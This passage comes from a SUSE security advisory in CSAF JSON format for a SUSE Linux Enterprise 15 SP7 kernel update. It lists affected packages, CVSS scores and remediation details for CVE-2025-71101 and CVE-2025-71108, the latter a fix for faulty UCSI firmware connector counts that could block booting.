"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71101"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
